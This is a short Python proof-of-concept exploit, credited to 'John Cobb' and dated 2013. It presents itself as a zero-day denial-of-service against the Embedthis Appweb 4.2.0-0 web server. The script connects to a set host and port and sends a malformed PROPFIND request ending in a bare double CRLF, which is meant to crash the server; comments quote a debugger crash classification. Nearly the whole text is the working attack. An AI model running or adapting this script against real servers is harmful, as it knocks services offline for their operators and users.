#!c:\python27\python.exe

#
# Embedthis Appweb 4.2.0-0
# 0Day DoS POC by John Cobb - www.NoBytes.com - 2013-02-16 - [v1.0]
# Tested on WinXP SP3 32bit
#
# !exploitable
# Exploitability Classification: UNKNOWN
# Recommended Bug Title: Data from Faulting Address controls Branch Selection starting at libmpr!mprSeekFile+0x000000000000000f (Hash=0x0c566765.0x0c1b6765)
# The data from the faulting address is later used to determine whether or not a branch is taken.
#

import socket

host = '127.0.0.1'
port = 80

request = "PROPFIND /index.html HTTP/1.1"
crash   = "\x0d\x0a\x0d\x0a"

packet = request + crash

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.sendall(packet)
s.close()